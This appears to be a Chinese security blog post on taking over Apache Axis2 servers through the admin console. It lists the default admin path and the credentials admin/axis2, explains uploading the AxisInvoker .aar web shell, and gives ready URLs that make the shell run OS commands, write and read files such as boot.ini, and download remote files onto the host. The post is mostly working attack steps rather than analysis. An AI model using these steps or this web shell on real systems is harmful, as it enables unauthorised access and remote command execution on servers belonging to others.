zoukankan      html  css  js  c++  java

  • Apache Axis2 后台文件上传getshell 漏洞复现


    0x00 前言

    Apache Axis2是一个Web服务的核心支援引擎。AXIS2对旧有的AXIS重新设计及重写,并提供两种语言JavaC的开发版本。

    事实上AXIS2 不只为WEB应用程序提供Web服务的界面,而且它也可以作为一个单独的服务器看待,而且很简单就能跟Apache Tomcat整合,目前AXIS2的最新版本是1.6.2。

    Axis是一个开源、基于XML的Web服务架构。最开始由IBM公司研发,叫IBM-SOAP。后来由Apache基金会在SOAP的基础上推出了AXIS。AXIS本质是一个Java语言编写的SOAP引擎。利用它我们可以在各种分布式应用中,让各个应用能够彼此操作、交互。

    0x01 漏洞复现

    默认端口:8089

    默认后台路径:/axis2-admin/login

    默认账号密码:admin/axis2

    选择Tools-“ Upload Service ”上传aar包 进行 getshell

    成功后会提示“ File AxisInvoker.aar successfully uploaded  ”

    http://xxx.xxx.xxx.xxx/axis2/services/Cat/exec?cmd=ipconfig

    0x02 使用方法

    马子的使用方法:

    支持的命令:
exec-运行命令,在Linux / Windows上均可使用,不用担心。
 
http://192.168.56.103:8080/axis2/services/AxisInvoker/exec?cmd=whoami
 
写-写文件
 
http://192.168.56.103:8080/axis2/services/AxisInvoker/write?path=c:1.1txt&content=123
 
info-显示某些信息,根据需要进行修改
 
http://192.168.56.103:8080/axis2/services/AxisInvoker/info
 
读取-读取文件内容
 
http://192.168.56.103:8080/axis2/services/AxisInvoker/read?path=c:oot.ini
 
下载-下载文件并将其保存在某处
 
http://192.168.56.103:8080/axis2/services/AxisInvoker/download?url=http://www.baidu.com&file=c:122.txt

    下载地址:https://github.com/CaledoniaProject/AxisInvoker

    转载请注明:Adminxe's Blog » Apache Axis2 后台文件上传getshell 漏洞复现

     
  • 相关阅读:
    hello word
    HDU 1006 Tick and Tick
    HDU 1005 Number Sequence
    HDU 1004 Let the Balloon Rise
    HDU 1003 Max Sum
    HDU 1002 A + B Problem II
    HDU 1001 Sum Problem
    HDU 1000 A + B Problem
    POJ 2253 Frogger
    POJ 2387 Til the Cows Come Home
  • 原文地址:https://www.cnblogs.com/cn-gov/p/14240455.html
Copyright © 2011-2022 走看看